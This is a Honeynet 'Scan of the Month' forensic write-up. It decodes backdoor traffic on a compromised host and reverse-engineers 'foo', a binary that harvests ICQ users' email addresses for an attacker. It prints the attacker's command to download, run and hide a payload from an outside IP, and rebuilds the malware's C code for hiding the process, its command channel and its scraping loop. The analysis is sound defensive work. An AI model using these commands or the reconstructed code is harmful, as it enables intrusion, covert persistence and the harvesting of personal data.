Scan of the Month 22 Analysis by Matei Conovici =============================================== 1. Introduction --------------- This is an analysis of the activities the attacker from the Reverse Challenge in July (http://project.honeynet.org) performed on a compromised system. It is my fist entry for a SoTM challenge so please bear with me :) 2. Tools -------- - tcpdump - tcpflow - objdump - the decoder for backdoor NVP traffic - home-grown perl/c programs for annotating the binary disassembly 3. Analysis ----------- 3.1 NVP backdoor traffic analysis First we begin by analysing the NVP backdoor traffic the attacker generated. As known from the Reverse Challenge, the backdoor installed is a server listening for commands sent using IP protocol 11 (NVP). The requests themselves come from spoofed IP addresses of other compromised system, acting as relay for the attacker. Lets find out what's going on. void:~$ tcpdump -r snort-0718\@1401.log -w 00-NVP-traffic.log proto 11 The decoder was slightly modified to display some more information. Protocol was decoded manually using the information in the Reverse Challenge reports. void:~$ decoder -p 00-NVP-traffic.log | less src: 94.0.146.98 dst: 172.16.183.2 dir: handler->agent 00 02 01 CB AD 90 32 00 00 00 00 00 00 00 00 00 Comments: Command 02: Initialization, handler address is 203.173.144.50 Ok, so the actual address of the handler is 203.173.144.50, we will only look at those packets and ignore the other 8 fake addresses the backdoor replies to. ---- src: 192.146.201.172 dst: 172.16.183.2 dir: handler->agent 00 03 67 72 65 70 20 2D 69 20 22 7A 6F 6E 65 22 ..grep -i "zone" 20 2F 65 74 63 2F 6E 61 6D 65 64 2E 63 6F 6E 66 /etc/named.conf 00 Comments: Command 03: Execute command and return output (grep -i "zone" /etc/named.conf). ---- src: 172.16.183.2 dst: 203.173.144.50 dir: agent->handler 67 03 7A 6F 6E 65 20 22 2E 22 20 7B 0A 7A 6F 6E g.zone "." {.zon 65 20 22 30 2E 30 2E 31 32 37 2E 69 6E 2D 61 64 e "0.0.127.in-ad 64 72 2E 61 72 70 61 22 20 7B 0A 00 dr.arpa" { Comments: Output was: ----------------- zone "." { zone "0.0.0.127.in-addr.arpa" { ----------------- The attacker will not be very pleased. This machine is not really a nameserver. ---- src: 172.16.183.2 dst: 203.173.144.50 dir: agent->handler 67 04 00 6F 6E 65 20 22 2E 22 20 7B 0A 7A 6F 6E g..one "." {.zon 65 20 22 30 2E 30 2E 31 32 37 2E 69 6E 2D 61 64 e "0.0.127.in-ad 64 72 2E 61 72 70 61 22 20 7B 0A 00 dr.arpa" { Comments: This is the "continuation" of the first reply packet. Actually, it's the same data. ---- src: 168.148.27.14 dst: 172.16.183.2 dir: handler->agent 00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73 ..killall -9 tts 65 72 76 65 00 erve Comments: Command 07: Execute, do not send output (killall -9 ttserve) kill the 'ttserve' process if it was already running. We will see below that the binary which will be installed will be named ttserve. ---- src: 10.39.81.89 dst: 172.16.183.2 dir: handler->agent 00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73 ..killall -9 tts 65 72 76 65 00 erve Comments: Repeat the kill command, maybe the first packet was lost. ---- src: 58.248.76.90 dst: 172.16.183.2 dir: handler->agent 00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 74 74 73 ..killall -9 tts 65 72 76 65 20 3B 20 6C 79 6E 78 20 2D 73 6F 75 erve ; lynx -sou 72 63 65 20 68 74 74 70 3A 2F 2F 32 31 36 2E 32 rce http://216.2 34 32 2E 31 30 33 2E 32 3A 38 38 38 32 2F 66 6F 42.103.2:8882/fo 6F 20 3E 20 2F 74 6D 70 2F 74 74 73 65 72 76 65 o > /tmp/ttserve 20 3B 20 63 68 6D 6F 64 20 37 35 35 20 2F 74 6D ; chmod 755 /tm 70 2F 74 74 73 65 72 76 65 20 3B 20 63 64 20 2F p/ttserve ; cd / 74 6D 70 20 3B 20 2E 2F 74 74 73 65 72 76 65 20 tmp ; ./ttserve 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F 74 74 ; rm -rf /tmp/tt 73 65 72 76 65 20 2E 2F 74 74 73 65 72 76 65 20 serve ./ttserve 3B 00 ; Comments: Command 07: Execute command. -- killall -9 ttserve lynx -source http://216.242.103.2:8882/foo > /tmp/ttserve chmod 755 /tmp/ttserve cd /tmp ./ttserve rm -rf /tmp/ttserve ./ttserve -- Here, the attacker downloads a 'foo' file as /tmp/ttserve and launches it, then removes the file. After being launched, the file can be safely removed from the filesystem. Since it's running, the kernel will not actually remove the file until it is released (when program exits), but it will no longer be visible in the /tmp directory. ---- src: 218.209.145.27 dst: 172.16.183.2 dir: handler->agent 00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E ..killall -9 lyn 78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F x ; rm -rf /tmp/ 74 74 73 65 72 76 65 3B 00 ttserve; Comments: Command 07: execute command -- killall -9 lynx rm -rf /tmp/ttserve -- After a while, if the download was not complete, kill lynx and remove the partially downloaded file so it is not discovered. ---- src: 122.255.17.55 dst: 172.16.183.2 dir: handler->agent 00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E ..killall -9 lyn 78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F x ; rm -rf /tmp/ 74 74 73 65 72 76 65 3B 00 ttserve; Comments: Repeat same command, in case first packet was lost. ---- src: 26.44.146.84 dst: 172.16.183.2 dir: handler->agent 00 07 6B 69 6C 6C 61 6C 6C 20 2D 39 20 6C 79 6E ..killall -9 lyn 78 20 3B 20 72 6D 20 2D 72 66 20 2F 74 6D 70 2F x ; rm -rf /tmp/ 74 74 73 65 72 76 65 3B 00 ttserve; Comments: Yet again. And ... this was it. Looks like the only things the attacker was interested in were to a) check if the machine is acting as a nameserver for interesting zones and b) launch the foo executable he has downloaded. Later, we will see that the address from which the file was downloaded was his 'home base'. Now, let's take a look at the downloaded file. 3.2 Analysis of 'foo' --------------------- Amusingly, "someone" changed the contents of the snort log so that the address 'foo' was downloaded from appears to be 11.11.11.11 instead of 216.242.103.2. Oh well :-) The 'foo' file was extracted from the snort log using tcpflow: void:~$ tcpflow -r snort-0718\@1401.log host 11.11.11.11 and port 8882 This will result in two files, each containing data sent by the two endpoints of the tcp connection. We are interested in the data in 011.011.011.011.08882-172.016.183.002.01025. void:~$ less 011.011.011.011.08882-172.016.183.002.01025 HTTP/1.1 200 OK Server: Foobarcatdog1 Content-type: text/x-csrc Content-length: 215464 Accept-Ranges: bytes ^?ELF^A^A^A^@^@^@^@^@^@^@^@^@^B^@^C^@^A^@^@^@<90><80>^4^@^@^@G^C^@^@^@^@^@4 OK, so it's an ELF binary, 215464 bytes in length. After editing the file and removing the HTTP reply headers, we're left with the binary itself. void:~$ file foo-binary foo-binary: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped What to do know? I've decided I'm not going to take the chance to run the file, even in a restricted environment but reverse engineer it instead. Running 'strings' on it reveals some interesting stuff, part of which is: void:~$ strings foo-binary | grep library @(#) The Linux C library 5.3.12 Aha, so its built on the same system the backdoor was. Nice... I've used a technique learned from some reverse challenge reports to obtain the library function addresses. I've downloaded this version of the library and unpacked libc.a, obtaining its object files. First, I've obtained the list of 'call' addresses in the disassembly. void:~$ objdump -d foo-binary | grep 'call 0x' | cut -f2 -dx | sort | uniq >routines.txt There are 378 unique addresses called. I wrote a small C program to linearly search the .text section of the library object files in the foo binary. The program would replace relocations in the object files with 0xFF and these bytes will be ignored when looking for matches. If a match is found, each symbol in the .text section of the object file will be output as: foo_text_start + foo_match_offset + symbol_offset_in_object where: foo_text_start virtual memory address of foo's .text section foo_match_offset start of object .text section in foo .text section symbol_offset_in_object symbols' offset in the .text section of the library object file. void:~$ ./matchfunctions -a -r routines.txt -d objects.txt -b foo-binary >libcalls.txt objects.txt is a file containing the paths to each object file in the library. The '-a' switch is used to generate a 'libmatches.txt' file where ALL matching library objects' symbols are emited. void:~$ cut -f1 -d: libcalls.txt | sort | uniq | wc -l tells me 276 of the 378 calls were found to be library calls. This leaves 102 unresolved addresses. Most of these must be intra-library calls. Let's see which are the unresolved symbols. Time to look at the annotated disassembly of foo. I wrote a small perl script to annotate each 'call' instruction with the library function name, if a match exists, or '' if none was found. void:~$ objdump -d foo-binary >disassemble void:~$ annotate.pl disassemble | grep '??' | cut -f2 -dx | cut -f1 -d" " | sort | uniq >calls.txt To remove intra-library calls, I looked for the lowest symbol address of the library. void:~$ sort libmatches.txt | head -1 080489e0: isalnum void:~$ sort calls.txt | less 600cef30 8048080 8048110 8048134 8048258 80482b8 8048300 8048318 8048384 804841c 8048670 80489a8 8048b40 ... So, everything starting after 0x080489a8 is library code, not interesting. This set is much more manageable. 0x600cef30 looks like bad disassembly so we take that out. void:~$ less disassemble-annotated.s 08048080 <.init>: 8048080: e8 93 c9 02 00 call 0x8074a18 < ?? > 8048085: c2 00 00 ret $0x0 [...] 08074a40 <.fini>: 8074a40: e8 cb 36 fd ff call 0x8048110 < ?? > 8074a45: c2 00 00 ret $0x0 OK, we also take out 0x8048080 and 0x08048110, which is library initialization and finalization code. This leaves us with: 0x08048134 0x08048258 0x080482b8 0x08048300 0x08048318 0x08048384 0x0804841c 0x08048670 0x080489a8 These 9 routines are the routines of the attackers program. I've changed the annotate.pl script to read a second file (other than library matches) to be able to assign names to these 9 functions as I disassemble them and find out what they do. First function is main() at 0x08048134, as can be seen at the beginning of the disassembly: 80480cf: e8 6c bf 01 00 call 0x8064040 <__libc_init> 80480d4: 68 40 4a 07 08 push $0x8074a40 80480d9: e8 be d8 00 00 call 0x805599c 80480de: 83 c4 04 add $0x4,%esp 80480e1: e8 9a ff ff ff call 0x8048080 < ?? > 80480e6: e8 49 00 00 00 call 0x8048134 80480eb: 50 push %eax 80480ec: e8 5f d9 00 00 call 0x8055a50 80480f1: 5b pop %ebx 80480f2: 8d b4 26 00 00 00 00 lea 0x0(%esi,1),%esi 80480f9: 8d b4 26 00 00 00 00 lea 0x0(%esi,1),%esi 8048100: b8 01 00 00 00 mov $0x1,%eax So we'll start with that. 8048134: 55 push %ebp 8048135: 89 e5 mov %esp,%ebp 8048137: 81 ec 34 75 00 00 sub $0x7534,%esp 804813d: c7 45 fc 00 00 00 00 movl $0x0,0xfffffffc(%ebp) 8048144: 68 30 75 00 00 push $0x7530 8048149: 6a 00 push $0x0 804814b: 8d 85 cc 8a ff ff lea 0xffff8acc(%ebp),%eax 8048151: 50 push %eax 8048152: e8 2d c9 01 00 call 0x8064a84 Disassembling this function and re-writing it into C code, it looks like this: int main(int argc, char **argv) { int l1; char buffer[30000]; l1 = 0; memset(buffer, 0, 30000); memset(argv[0], 0, strlen(argv[0])); strcpy(argv[0], "(nfsiod)"); signal(SIGCHLD, SIG_IGN); /* parent exits after fork() */ if (fork() != 0) exit(0); /* become session leader */ setsid(); signal(SIGCHLD, SIG_IGN); /* this is usually 'daemon' */ setuid(1); seteuid(1); /* parent exits after fork() */ if (fork() != 0) exit(0); signal(SIGPIPE, SIG_IGN); chdir("/"); signal(SIGCHLD, SIG_IGN); while (1) { l1 = function1(l1, buffer); /* 0x0804841c */ function2(l1, buffer, 30000); /* 0x08048670 */ sleep(1); } } The code is "a bit" naive, but what it tries to do is daemonize and hide itself by rewriting its command-line, so it appears this is a system process at 'ps' (nfsiod, running as user daemon). It seems that the actual work is performed in function1() and function2(), so we're going to leave those and take a look at the other 6 functions. 8048258: 55 push %ebp 8048259: 89 e5 mov %esp,%ebp 804825b: 83 ec 08 sub $0x8,%esp 804825e: 8b 45 08 mov 0x8(%ebp),%eax 8048261: 50 push %eax 8048262: e8 71 32 00 00 call 0x804b4d8 8048267: 83 c4 04 add $0x4,%esp 804826a: 89 c0 mov %eax,%eax 804826c: 89 c2 mov %eax,%edx 804826e: 89 55 fc mov %edx,0xfffffffc(%ebp) 8048271: 83 fa ff cmp $0xffffffff,%edx 8048274: 75 39 jne 0x80482af 8048276: 8b 45 08 mov 0x8(%ebp),%eax 8048279: 50 push %eax 804827a: e8 4d 23 00 00 call 0x804a5cc 804827f: 83 c4 04 add $0x4,%esp 8048282: 89 c0 mov %eax,%eax 8048284: 89 45 f8 mov %eax,0xfffffff8(%ebp) 8048287: 83 7d f8 00 cmpl $0x0,0xfffffff8(%ebp) 804828b: 75 0b jne 0x8048298 804828d: 6a 00 push $0x0 804828f: e8 bc d7 00 00 call 0x8055a50 8048294: 83 c4 04 add $0x4,%esp 8048297: 90 nop 8048298: 6a 04 push $0x4 804829a: 8d 45 fc lea 0xfffffffc(%ebp),%eax 804829d: 50 push %eax 804829e: 8b 45 f8 mov 0xfffffff8(%ebp),%eax 80482a1: 8b 50 10 mov 0x10(%eax),%edx 80482a4: 8b 02 mov (%edx),%eax 80482a6: 50 push %eax 80482a7: e8 3c b6 01 00 call 0x80638e8 80482ac: 83 c4 0c add $0xc,%esp 80482af: 8b 45 fc mov 0xfffffffc(%ebp),%eax 80482b2: eb 00 jmp 0x80482b4 80482b4: 89 ec mov %ebp,%esp 80482b6: 5d pop %ebp 80482b7: c3 ret This is a helper routine, to obtain an IP address out of a string representation of either an IP address or a host name. Seems the attacker doesn't know gethostbyname() already does that. Re-written into C, this routine looks something like this: unsigned int ip_address(char *name) { unsigned int ip; struct hostent *he; ip = inet_addr(name); if (ip != ~0L) return ip; he = gethostbyname(name); if (!he) exit(0); bcopy(he->h_addr, &ip, 4); return ip; } Lets look at the next function, at 0x080482b8. 80482b8: 55 push %ebp 80482b9: 89 e5 mov %esp,%ebp 80482bb: 83 ec 04 sub $0x4,%esp 80482be: 6a 11 push $0x11 80482c0: 6a 02 push $0x2 80482c2: 6a 02 push $0x2 80482c4: e8 27 bd 01 00 call 0x8063ff0 80482c9: 83 c4 0c add $0xc,%esp 80482cc: 89 c0 mov %eax,%eax 80482ce: 89 45 fc mov %eax,0xfffffffc(%ebp) 80482d1: 83 7d fc 00 cmpl $0x0,0xfffffffc(%ebp) 80482d5: 75 0d jne 0x80482e4 80482d7: 6a 00 push $0x0 80482d9: e8 72 d7 00 00 call 0x8055a50 80482de: 83 c4 04 add $0x4,%esp 80482e1: 8d 76 00 lea 0x0(%esi),%esi 80482e4: 68 00 08 00 00 push $0x800 80482e9: 6a 04 push $0x4 80482eb: 8b 45 fc mov 0xfffffffc(%ebp),%eax 80482ee: 50 push %eax 80482ef: e8 94 c1 01 00 call 0x8064488 80482f4: 83 c4 0c add $0xc,%esp 80482f7: 8b 45 fc mov 0xfffffffc(%ebp),%eax 80482fa: eb 00 jmp 0x80482fc 80482fc: 89 ec mov %ebp,%esp 80482fe: 5d pop %ebp 80482ff: c3 ret Re-writing this back into C, this function looks like this: int nblk_udp_socket() { int sock; sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if (sock == 0) exit(0); fcntl(sock, F_SETFL, O_NONBLOCK); return sock; } Ok, so this function creates a non-blocking UDP socket. The check on the return value of socket() is wrong, socket() returns -1 on error. Next function is at 0x08048300. 8048300: 55 push %ebp 8048301: 89 e5 mov %esp,%ebp 8048303: 8b 45 08 mov 0x8(%ebp),%eax 8048306: 50 push %eax 8048307: e8 50 c1 01 00 call 0x806445c 804830c: 83 c4 04 add $0x4,%esp 804830f: 31 c0 xor %eax,%eax 8048311: eb 01 jmp 0x8048314 8048313: 90 nop 8048314: 89 ec mov %ebp,%esp 8048316: 5d pop %ebp 8048317: c3 ret This is a function that proves to be very useful :-) It is a much-required-for wrapper around close(). We'll call it fd_close(). void fd_close(int fd) { close(fd); } Next function, at 0x08048318: 8048318: 55 push %ebp 8048319: 89 e5 mov %esp,%ebp 804831b: 83 ec 10 sub $0x10,%esp 804831e: 83 7d 08 00 cmpl $0x0,0x8(%ebp) 8048322: 74 58 je 0x804837c 8048324: 6a 10 push $0x10 8048326: 8d 45 f0 lea 0xfffffff0(%ebp),%eax 8048329: 50 push %eax 804832a: e8 65 c5 01 00 call 0x8064894 804832f: 83 c4 08 add $0x8,%esp 8048332: 68 53 4a 07 08 push $0x8074a53 8048337: e8 1c ff ff ff call 0x8048258 804833c: 83 c4 04 add $0x4,%esp 804833f: 89 c0 mov %eax,%eax 8048341: 89 45 f4 mov %eax,0xfffffff4(%ebp) 8048344: 66 c7 45 f0 02 00 movw $0x2,0xfffffff0(%ebp) 804834a: 66 c7 45 f2 d0 a5 movw $0xa5d0,0xfffffff2(%ebp) 8048350: 6a 10 push $0x10 8048352: 8d 45 f0 lea 0xfffffff0(%ebp),%eax 8048355: 50 push %eax 8048356: 6a 00 push $0x0 8048358: 8b 45 10 mov 0x10(%ebp),%eax 804835b: 50 push %eax 804835c: 8b 45 0c mov 0xc(%ebp),%eax 804835f: 50 push %eax 8048360: 8b 45 08 mov 0x8(%ebp),%eax 8048363: 50 push %eax 8048364: e8 27 bc 01 00 call 0x8063f90 8048369: 83 c4 18 add $0x18,%esp 804836c: 89 c0 mov %eax,%eax 804836e: 85 c0 test %eax,%eax 8048370: 7d 0a jge 0x804837c 8048372: 6a 00 push $0x0 8048374: e8 d7 d6 00 00 call 0x8055a50 8048379: 83 c4 04 add $0x4,%esp 804837c: 31 c0 xor %eax,%eax 804837e: eb 00 jmp 0x8048380 8048380: 89 ec mov %ebp,%esp 8048382: 5d pop %ebp 8048383: c3 ret Let's translate this into C: void send_home_message(int sock, char *buffer, int len) { struct sockaddr_in saddr; bzero(&saddr, sizeof(struct sockaddr_in)); saddr.sin_addr.s_addr = ip_address("216.242.103.2"); saddr.sin_family = AF_INET; saddr.sin_port = 42448; /* htons(53413) */ if (sendto(sock, buffer, len, 0, (struct sockaddr *) & saddr, sizeof(struct sockaddr_in)) < 0) exit(0); } This routine sends some data to the mother ship :-) Next routine is at 0x08048384. 8048384: 55 push %ebp 8048385: 89 e5 mov %esp,%ebp 8048387: 83 ec 18 sub $0x18,%esp 804838a: c7 45 ec 10 00 00 00 movl $0x10,0xffffffec(%ebp) 8048391: c7 45 e8 00 00 00 00 movl $0x0,0xffffffe8(%ebp) 8048398: 8b 45 10 mov 0x10(%ebp),%eax 804839b: 50 push %eax 804839c: 8b 45 0c mov 0xc(%ebp),%eax 804839f: 50 push %eax 80483a0: e8 ef c4 01 00 call 0x8064894 80483a5: 83 c4 08 add $0x8,%esp 80483a8: 83 7d 08 00 cmpl $0x0,0x8(%ebp) 80483ac: 74 66 je 0x8048414 80483ae: 6a 10 push $0x10 80483b0: 8d 45 f0 lea 0xfffffff0(%ebp),%eax 80483b3: 50 push %eax 80483b4: e8 db c4 01 00 call 0x8064894 80483b9: 83 c4 08 add $0x8,%esp 80483bc: 68 53 4a 07 08 push $0x8074a53 80483c1: e8 92 fe ff ff call 0x8048258 80483c6: 83 c4 04 add $0x4,%esp 80483c9: 89 c0 mov %eax,%eax 80483cb: 89 45 f4 mov %eax,0xfffffff4(%ebp) 80483ce: 66 c7 45 f0 02 00 movw $0x2,0xfffffff0(%ebp) 80483d4: 66 c7 45 f2 d0 a5 movw $0xa5d0,0xfffffff2(%ebp) 80483da: 8d 45 ec lea 0xffffffec(%ebp),%eax 80483dd: 50 push %eax 80483de: 8d 45 f0 lea 0xfffffff0(%ebp),%eax 80483e1: 50 push %eax 80483e2: 6a 00 push $0x0 80483e4: 8b 45 10 mov 0x10(%ebp),%eax 80483e7: 50 push %eax 80483e8: 8b 45 0c mov 0xc(%ebp),%eax 80483eb: 50 push %eax 80483ec: 8b 45 08 mov 0x8(%ebp),%eax 80483ef: 50 push %eax 80483f0: e8 ef ba 01 00 call 0x8063ee4 80483f5: 83 c4 18 add $0x18,%esp 80483f8: 89 c0 mov %eax,%eax 80483fa: 89 45 e8 mov %eax,0xffffffe8(%ebp) 80483fd: 83 7d e8 00 cmpl $0x0,0xffffffe8(%ebp) 8048401: 7d 09 jge 0x804840c 8048403: 31 c0 xor %eax,%eax 8048405: eb 11 jmp 0x8048418 8048407: 90 nop 8048408: eb 0a jmp 0x8048414 804840a: 8d 36 lea (%esi),%esi 804840c: b8 01 00 00 00 mov $0x1,%eax 8048411: eb 05 jmp 0x8048418 8048413: 90 nop 8048414: 31 c0 xor %eax,%eax 8048416: eb 00 jmp 0x8048418 8048418: 89 ec mov %ebp,%esp 804841a: 5d pop %ebp 804841b: c3 ret This looks like the inverse routine of send_home_message, we'll call it recv_home_message. int recv_home_message(int sock, char *buffer, int len) { struct sockaddr_in saddr; int slen; int nbytes; slen = sizeof(struct sockaddr_in); l1 = 0; bzero(buffer, len); bzero(& saddr, sizeof(struct sockaddr_in)); saddr.sin_addr.s_addr = ip_address("216.242.103.2"); saddr.sin_family = AF_INET; saddr.sin_port = 42448; /* htons(53413) */ nbytes = recvfrom(sock, buffer, len, 0, (struct sockaddr *) & saddr, &slen); if (nbytes >= 0) return 1; return 0; } The following two functions are rather long, because they actually perform some work (these are the two routines called from main), so we'll look at 0x080489a8. 80489a8: 55 push %ebp 80489a9: 89 e5 mov %esp,%ebp 80489ab: 83 ec 04 sub $0x4,%esp 80489ae: 8d 45 fc lea 0xfffffffc(%ebp),%eax 80489b1: 50 push %eax 80489b2: 68 1b 54 00 00 push $0x541b 80489b7: 8b 45 08 mov 0x8(%ebp),%eax 80489ba: 50 push %eax 80489bb: e8 6c bb 01 00 call 0x806452c 80489c0: 83 c4 0c add $0xc,%esp 80489c3: 89 c0 mov %eax,%eax 80489c5: 83 f8 ff cmp $0xffffffff,%eax 80489c8: 75 0a jne 0x80489d4 80489ca: b8 ff ff ff ff mov $0xffffffff,%eax 80489cf: eb 0b jmp 0x80489dc 80489d1: 8d 76 00 lea 0x0(%esi),%esi 80489d4: 8b 45 fc mov 0xfffffffc(%ebp),%eax 80489d7: eb 03 jmp 0x80489dc 80489d9: 8d 76 00 lea 0x0(%esi),%esi 80489dc: 89 ec mov %ebp,%esp 80489de: 5d pop %ebp 80489df: c3 ret Put in plain C, this looks like: int bytes_avail(int sock) { int res; if (ioctl(sock, FIONREAD, &res) == -1) return -1; return res; } Now it's time to look at the two other functions. I will not quote the disassembly here, but rather the translated C source. They don't look very pretty but they're readable. Two global variables seem to be used, one of which was declared static (it's in the .bss section). unsigned int start_uin; /* 0x0807ad84 */ static int buf_len; /* 0x08080f38 */ int function1(int uin, char *retbuf) { int sock, cnt; int l3; char buffer[1024]; l3 = 1; /* return next UIN if this block was not finished */ if ((uin <= start_uin + 98) && (start_uin != 0)) return uin + 1; sock = nblk_udp_socket(); /* this means we have something to send home */ if (strlen(retbuf) > 3) { /* try to send it until confirmation is received or we timeout. Looks like there is a bug in the handling of buf_len ?! */ while (l3) { cnt = 0; retbuf[buf_len++] = '\0'; while (cnt <= 10) { send_home_message(sock, retbuf, buf_len); sleep(10); cnt++; if (recv_home_message(sock, buffer, 1000) > 0) { if (! strncmp(buffer, "GOT", 3)) { l3 = 0; break; } } } if (cnt > 10) exit(0); } } /* Request new block of UINs to collect */ cnt = 0; while (cnt <= 10) { send_home_message(sock, "GU\n", 3); sleep(10); cnt++; if (recv_home_message(sock, buffer, 1000) > 0) { /* maybe we're being asked to shut up */ if (! strncmp(buffer, "DIE", 3)) { fd_close(sock); exit(0); } /* ... or we receive new work */ if (! strncmp(buffer, "DU", 2)) { /* 0x0804de0c, most likely sscanf */ sscanf(buffer + 2, "%lu", &start_uin); memset(retbuf, 0, 30000); /* 0x0804ddf4, identified as _IO_sscanf, but rather it is sprintf */ sprintf(retbuf, "SE%lu\n", start_uin); buf_len = strlen(retbuf); fd_close(sock); return start_uin; } } } fd_close(sock); exit(0); } void function2(int uin, char *retbuf, int retsize) { struct sockaddr_in saddr; int sock, cnt, run, state; char buffer[1024]; char c1, c2; time_t req_sent; run = 1; state = 0; c1 = ' '; req_sent = 0; saddr.sin_addr.s_addr = ip_address("web.icq.com"); saddr.sin_family = AF_INET; saddr.sin_port = htons(80); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (connect(sock, (struct sockaddr *) & saddr, sizeof(struct sockaddr_in)) == -1) { close(sock); return; } sleep(1); fcntl(sock, F_SETFL, O_NONBLOCK); sprintf(buffer, "GET /wwp?Uin=%lu HTTP/1.0\r\nHost: web.icq.com\r\n\r\n", uin); send(sock, buffer, strlen(buffer), 0); req_sent = time(NULL); while (run) { if (time(NULL) - req_sent > 25) run = 0; if (! bytes_avail(sock)) continue; cnt = read(sock, &c2, 1); if (cnt != 1) continue; /* state is like this: 0 - look for '"' 1 - inside quotes, check if this is a mailto (state 2), otherwise go back in state 0 2 - copy email address until quote is found or buffer runs out */ if (state == 0) { if (c2 == '"') state = 1; } else if (state == 1) { if ((c1 == '"') && (c2 != 'm')) state = 0; if ((c1 == 'm') && (c2 != 'a')) state = 0; if ((c1 == 'a') && (c2 != 'i')) state = 0; if ((c1 == 'i') && (c2 != 'l')) state = 0; if ((c1 == 'l') && (c2 != 't')) state = 0; if ((c1 == 't') && (c2 != 'o')) state = 0; if ((c1 == 'o') && (c2 != ':')) state = 0; /* found "mailto:, go to state 2 */ state = 2; } else if (state == 2) { if (buf_len > retsize - 1) { close(sock); sleep(1); } if (c2 == '"') { retbuf[buf_len++] = '\n'; close(sock); sleep(1); return; } if (isprint(c2)) retbuf[buf_len++] = c2; } /* save last char */ c1 = c2; } close(sock); } By now, the purpose of the program is quite clear. It will connect to the home address of the attacker, using udp on port 53413 and say hello ("GU"). There are two possible answers to this greeting. One is "DIE", which instructs the program to exit and the other is "DUxxxxxx" where xxxxx is a decimal number. The number following the "DU" string is the start of a block of 100 ICQ user IDs whose profiles will be harvested for email addresses. function1 is responsible for communication with attacker's home machine and setting up the next ICQ id to probe, while function2 retrieves the profile, looks for the string '"mailto:' and copies the email address in the large buffer (30000 bytes) allocated in the main function. Email addresses are separated by newline. When 100 user IDs have been harvested, the result is sent home. The buffer looks something like: SExxxxxxxx <---- this is the start of the block email1@email.com email2@email.com ... etc After sending this buffer, the foo program will expect confirmation from the home machine, which consists of a packet containing the "GOT" acknowledgment. If the acknowledgment is received, the program will send the "GU" greeting again and wait for more instructions (DIE or DUxxxxx). Let's take a look at the snort log again. First, let's get out the connections to the ICQ webservers (205.188.248.25, 205.188.248.57, 205.188.248.89). (03-no-foo-download.log contains all traffic except NVP backdoor traffic and the download of the foo file) void:~$ tcpdump -r 03-no-foo-download.log -w 05-no-icq.log host not web.icq.com Let's examine home communication: void:~$ tcpdump -r 05-no-icq.log -X udp and port 53413 22:57:55.439307 172.16.183.2.1025 > 11.11.11.11.53413: udp 3 0x0000 4500 001f 00c9 0000 4011 d6fd ac10 b702 E.......@....... 0x0010 0b0b 0b0b 0401 d0a5 000b 36d4 4755 0a ..........6.GU. 22:57:55.493471 11.11.11.11.53413 > 172.16.183.2.1025: udp 10 0x0000 4500 0026 0363 0000 3511 df5c 0b0b 0b0b E..&.c..5..\.... 0x0010 ac10 b702 d0a5 0401 0012 7922 4455 3932 ..........y"DU92 0x0020 3037 3130 300a 07100. Hmm, only two packets. The first is the "GU\n" greeting from the program to the home machine, the second is from the home machine and instructs the program to start harvesting from ICQ ID 9207100. Looking at the number of flows to the ICQ server we can find all 100 requests, but the UDP packet which reports home was not found in the snort log. It was either removed from the snort log in order to obfuscate it, or the program has a bug which I cannot find :-( 4. Answers 4.1.What is the attacker's IP address? Most likely, this is 216.242.103.2. This is the address the foo program was downloaded from, as well as the IP address from which instructions are expected to come, and results are sent, by the 'foo' program. 4.2.What is the attacker doing first? What do you think is his/her motivation for doing this? First, the attacker checks if this machine is a nameserver for some domains. His motivation could be to forge some host names, to appear they belong to one of the domains served by this nameserver. 4.3.Why there is some readable text in packets #17-#25 (and some others), but not in packets #15-#16 (and several others)? What differentiates these groups of packets from each other? I assume the padding in the NVP backdoor traffic is not encrypted and the clear-text contents of those packets is the contents of the memory buffer used for decryption of previous packets. 4.4.What is the purpose of 'foo'? Can you provide more insights about the internal workings of 'foo'? Do you think that 'foo' was coded by a good programmer or by an amateur? Please refer to section 3.2, where a detailed analysis of 'foo' was performed. The purpose of this program is to harvest email addresses of ICQ users. The program was coded by a beginner. There is unnecessarily complex code to daemonize the process, nonblocking I/O is incorrectly used (for instance, the program is busy-waiting in function2() for data), the check for an error return value from socket() is wrong, ip_address is not needed since gethostbyname() is enough to parse a dotted decimal representation of a host's IP address, etc. 4.5.What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done by the attacker? This is done by the attacker to hide the existance of the 'foo' binary on the compromised system. Once ttserver (the downloaded 'foo' program) is launched, it daemonizes itself and hides from 'ps' by overwriting its commandline so it appears to be "(nfsiod)" running as user daemon, thus a system process. If the program is running, when the executable file is rm'ed, it is not really deleted from disk, but rather its inode is marked as deleted. Since the inode is locked (because the program is running), the file will actually be removed only when the program terminates. 4.6.How do you think the attacker will use the results of his activity involving 'foo'? My first guess was that his activity (collecting email addresses of ICQ users) was related to a possible ICQ hack (stealing of ICQ accounts). This cannot be true, since there is no way the attacker is going to be able to say which UIN a certain email address belongs to. Even though UINs are scanned sequentially, some UINs are not in use any more and on those UINs profile page, there will be no email address listed, thus no line will be generated for those UINs in the report packet. Actually, there are 164 email addresses in those 100 tcp flows to web.icq.com. Of those, 88 are email addresses of the form UIN@pager.icq.com for an email-to-icq gateway at icq.com and 76 addresses are listed as user email addresses. However, only the first email address is saved, so there is no way this address (@pager.icq.com) can be related to the real email address. My best guess is that these email addresses are harvested for spamming (possibly sell the lists to spammers ?!), nothing more. Bonus Question: 4.7.If you administer a network, would you have caught such NVP backdoor communication? If yes, how? If you do not administer a network, what do you think is the best way to prevent such communication from happening and/or detect it? Because of a lack of system administration resources, I wouldn't have detected the NVP backdoor traffic in a timely manner, as the firewall logs are only analyzed from time to time. However, the firewall wouldn't have allowed this traffic to pass, as we're implicitly denying whatever is not explicitly allowed, thus blocking this kind of communication and render the backdoor unusable. I believe this is a good policy, as an attacker would be forced to use an "open" communication channel, which would be less likely possible if the attack (wu-ftpd exploit, installation of backdoor, etc) was automated. The attacker would have to first look for some means of passing traffic through the firewall and adapt the backdoor server accordingly.